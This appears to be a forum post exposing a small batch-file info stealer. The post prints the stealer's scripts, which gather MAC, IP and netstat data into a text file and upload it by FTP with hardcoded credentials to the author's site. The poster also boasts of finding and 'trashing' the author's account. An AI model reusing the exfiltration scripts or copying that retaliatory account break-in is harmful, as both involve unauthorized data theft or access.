Well, as promised, here is Mr. Boocy's (little eminem) Program.
It install to a folder in the root (c:\) directory called My program containing the files listed below:
mac.txt (this file is uploaded to his site)
MacDaddy.bat
MyUploadFiles.ftp
program.bat (same as MacDaddy.bat)
start.bat
unins000.dat
unins000.exe (the uninstall file)
UploadFiles.bat (calls the MyUploadFile.ftp file)
First start.bat runs and changes the font color in cmd to green, then calls two files: MacDaddy.bat and UploadFiles.bat like so:
#contents of start.bat
@echo off
color 02
call MacDaddy.lnk
call UploadFiles
Next MacDaddy.bat (or program.bat) Echos the date and time, runs GetMac, ipconfig and netstat (which are placed in the mac.txt file) like so:
#contents of MacDaddy.bat (and program.bat)
@echo off
Echo date: %date% - Time: %time%
GetMac
ipconfig
netstat
Next the start.bat file calls UploadFiles.bat which in turn runs MyUploadFiles.ftp, Here's the command used.
ftp -n -i -s:MyUploadFiles.ftp
MyUploadFiles.ftp opens ftp.admin.scripterz.org, logs in with username boocy and password boocy, sets type to ascii and then uploads the mac.txt file to his site. and the commands use are:
#content of My UploadFiles.ftp
open ftp.admin.scripterz.org
user boocy boocy
ASCII
send mac.txt
Of course after he couldn't change his password for this account he finally just deleted it and made a new one. I am currently in the process of finding the new one and trashing it as well. Perhaps this kid will learn eventually that he needs to learn the basics before he can be successful in anything he does and that Crime really doesn't pay. Well once again, I hope everyone has enjoyed these antics.
